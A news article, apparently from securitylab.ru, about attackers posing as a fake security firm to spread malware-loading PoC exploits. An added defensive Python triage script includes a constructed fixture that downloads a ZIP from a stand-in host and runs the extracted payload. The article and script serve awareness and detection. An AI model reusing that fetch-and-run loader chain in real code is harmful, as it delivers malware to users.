Saturday, April 13, 2024

Attackers have invented an entire cybersecurity firm to effectively distribute malicious PoC exploits


The “authoritative experts” of “High Sierra Cyber Security” turned out to be nothing more than fakes assembled from other people’s photos and data.


A malicious campaign recently discovered by VulnCheck researchers proves once again that attackers keep inventing new strategies in an attempt to fool their victims and get what they want.

Last month, fake accounts imitating security researchers from various large companies began appearing on GitHub and Twitter*. Posing as white-hat hackers united “under the roof” of the fictitious company “High Sierra Cyber Security”, the attackers publish fake PoC exploits for zero-day vulnerabilities that, ironically, infect Windows and Linux computers with malware.

The hacker accounts look quite legitimate as they imitate real researchers from various cybersecurity companies using their names and photos.



Fake accounts pretending to be real professionals

According to the researchers, attackers mainly publish exploits for zero-day vulnerabilities in popular software such as Chrome, Discord, Signal, WhatsApp and Microsoft Exchange. In all cases, the malicious repositories contain a Python script that acts as a malware loader for Linux and Windows systems.

The script downloads a ZIP archive from an external URL to the victim’s computer depending on its operating system: Linux users download “cveslinux.zip” and Windows users get “cveswindows.zip”. The malware is stored in the %Temp% folder for Windows or /home//.local/share for Linux, extracted, and run.

VulnCheck reports that the Windows executable is detected by over 60% of the antivirus engines on VirusTotal. The Linux executable, by contrast, is far stealthier and is detected by only three scanners.

The scope and number of victims of this campaign is still unclear, but VulnCheck notes that the attackers are quite persistent and regularly create new accounts and repositories when existing ones are deleted due to complaints.

Cybersecurity researchers and enthusiasts should be extremely careful when downloading scripts from unknown repositories, as the owner of such a repository may well be a scammer.

North Korean hacker group Lazarus ran a similar campaign in early 2021. Back then, digital thugs also created fake social media profiles of vulnerability researchers to attack researchers with malware disguised as PoC exploits.

By infecting the devices of cybersecurity researchers, attackers can gain access to unpublished vulnerability research that can later be used in their own attacks. Worse still, they can carry out a ransomware attack, after which the company’s reputation will be permanently damaged. After all, what kind of cybersecurity company is it that could not protect itself from an attack?

When you download code from GitHub, you need to check it carefully for malicious behavior. In the case discussed above, the download and execution of malware is visible to the naked eye when examining the code, but this may not always be so, especially if the attackers deliberately obfuscate the malicious code. That is why researchers must remain maximally vigilant in the face of such attacks.
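The manual review the article recommends can be partly automated for the loader pattern it describes (fetch an archive, unpack it, run the result, branch on the operating system). The following static triage script is an added example, not code from VulnCheck or from the campaign; the library call names it looks for are assumptions, and the sample script it analyses is a constructed fixture with an invalid domain, not the real loader.

```python
import ast

# Behaviours the article describes in the fake PoC scripts (fetch, unpack, run, OS branch); call names are assumptions.
SUSPECT = {
    "download": {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"},
    "extract": {"zipfile.ZipFile", "tarfile.open", "shutil.unpack_archive"},
    "execute": {"subprocess.run", "subprocess.Popen", "subprocess.call", "os.system"},
    "os_check": {"platform.system", "sys.platform", "os.name"},
}

def _dotted(node):  # 'a.b.c' for a Name/Attribute chain, else None
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    return ".".join(reversed(parts + [node.id]))

def triage(source):
    """Statically list suspect calls in a script, grouped by behaviour."""
    tree = ast.parse(source)
    aliases = {}  # local name -> qualified name, so 'sp.run' resolves to subprocess.run
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    seen = set()
    for node in ast.walk(tree):
        name = _dotted(node.func if isinstance(node, ast.Call) else node) or ""
        head, _, rest = name.partition(".")
        seen.add(aliases.get(head, head) + ("." + rest if rest else ""))
    return {cat: names & seen for cat, names in SUSPECT.items()}

def is_loader_like(found):
    """True when the full download -> extract -> execute chain is present."""
    return all(found[cat] for cat in ("download", "extract", "execute"))

# Constructed fixture in the shape the article describes; not the real script.
SAMPLE = """
import platform, zipfile, subprocess as sp
from urllib.request import urlretrieve
name = "cveslinux.zip" if platform.system() == "Linux" else "cveswindows.zip"
urlretrieve("https://example.invalid/" + name, name)
zipfile.ZipFile(name).extractall(".")
sp.run(["./payload"])
"""
```

Run `triage(SAMPLE)` on a downloaded PoC before executing it; a hit on the full chain is a reason to read the script line by line, while an empty result is not proof of safety, since obfuscated code (exec of decoded strings, for instance) escapes this check.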


* The social network is banned in the Russian Federation.



Source: www.securitylab.ru
